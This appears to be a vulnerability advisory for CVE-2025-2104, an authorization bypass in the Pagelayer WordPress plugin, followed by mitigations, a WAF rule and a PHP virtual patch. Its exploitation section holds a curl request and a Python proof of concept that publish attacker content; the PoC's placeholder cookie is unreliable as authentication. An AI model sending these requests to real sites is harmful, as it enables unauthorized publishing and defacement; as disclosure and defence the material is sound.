How CVE-2025-2104 Works
The Page Builder: Pagelayer plugin (≤ v1.9.8) for WordPress contains a flawed `pagelayer_save_content()` function that does not properly validate user permissions before executing post updates. Attackers with Contributor-level access (or higher) can bypass WordPress’s default post moderation system by sending a crafted HTTP POST request containing malicious post data. The function does not verify whether the user has the `publish_posts` capability, which allows unauthorized changes of post status from “draft” to “publish.” The cause is missing capability checks and improper nonce validation in the AJAX handlers.
DailyCVE Form:
Platform: WordPress
Version: ≤ 1.9.8
Vulnerability: Auth Bypass
Severity: Critical
Date: 2025-03-13
Prediction: Patch by 2025-06-20
What Undercode Say:
Exploitation:
1. Craft Malicious Request:
curl -X POST https://target.com/wp-admin/admin-ajax.php \
  -d 'action=pagelayer_save_content&post_id=123&status=publish'
2. Python PoC:
import requests

data = {
    'action': 'pagelayer_save_content',
    'post_id': '123',
    'content': ' <h1>Hacked</h1> ',
    'status': 'publish'
}
requests.post("http://wordpress-site/wp-admin/admin-ajax.php", data=data, cookies={"wordpress_logged_in": "1"})
Mitigation:
1. Temporary Fix:
Add capability checks in `pagelayer_save_content()`:
if (!current_user_can('publish_posts')) { wp_die('Unauthorized'); }
2. WAF Rule (ModSecurity):
SecRule ARGS:action "@streq pagelayer_save_content" \
    "id:1005,deny,status:403,msg:'Pagelayer Exploit Attempt'"
3. Detection Command:
grep -r "pagelayer_save_content" /var/www/html/wp-content/plugins/pagelayer/
4. Patch Monitoring:
watch -n 3600 wp plugin update --dry-run pagelayer
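5. Log Analysis (the default access log records the request line, not POST bodies, so this matches only when the action appears in the query string):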
tail -f /var/log/apache2/access.log | grep 'admin-ajax.php' | grep 'pagelayer_save_content'
6. Disable Plugin (Emergency):
wp plugin deactivate pagelayer
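A virtual patch for the missing capability check described under Temporary Fix, for sites that cannot edit the plugin file. This is an added example, not Pagelayer's or this page's own code; the file path, the `plg_` names, and the premise that the plugin saves through `wp_update_post()`/`wp_insert_post()` (so the `wp_insert_post_data` filter fires) are assumptions.

```php
<?php
/**
 * Plugin Name: Pagelayer publish guard (added example, hypothetical name)
 * Save as wp-content/mu-plugins/pagelayer-publish-guard.php (path is an assumption).
 * Assumes the plugin writes posts through wp_update_post()/wp_insert_post().
 */

// Statuses that expose or schedule content without editorial review.
const PLG_GUARDED_STATUSES = array( 'publish', 'future', 'private' );

add_filter( 'wp_insert_post_data', 'plg_block_unmoderated_publish', 10, 2 );

function plg_block_unmoderated_publish( $data, $postarr ) {
    // Act only on the AJAX action named in the advisory.
    $action = isset( $_REQUEST['action'] )
        ? sanitize_key( wp_unslash( $_REQUEST['action'] ) )
        : '';
    if ( ! wp_doing_ajax() || 'pagelayer_save_content' !== $action ) {
        return $data;
    }

    $requested = $data['post_status'];
    if ( ! in_array( $requested, PLG_GUARDED_STATUSES, true ) ) {
        return $data; // draft/pending saves are what Contributors may do
    }

    // Stored status of the post being updated ('' for a new post).
    $stored = empty( $postarr['ID'] ) ? '' : (string) get_post_status( (int) $postarr['ID'] );
    if ( $stored === $requested ) {
        return $data; // no status transition requested
    }

    // Resolve the publish capability for this post type (publish_posts for posts).
    $type = get_post_type_object( $data['post_type'] );
    $cap  = $type ? $type->cap->publish_posts : 'publish_posts';
    if ( current_user_can( $cap ) ) {
        return $data;
    }

    // Refuse the transition: keep the stored status, or queue new posts for review.
    $data['post_status'] = '' !== $stored ? $stored : 'pending';
    error_log( sprintf(
        'pagelayer guard: user %d denied %s -> %s on post %d',
        get_current_user_id(), $stored ?: 'new', $requested, (int) ( $postarr['ID'] ?? 0 )
    ) );
    return $data;
}
```

Denied transitions are written to the PHP error log, which gives a detection signal for requests whose parameters travel in the POST body.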
Sources:
Reported By: nvd.nist.gov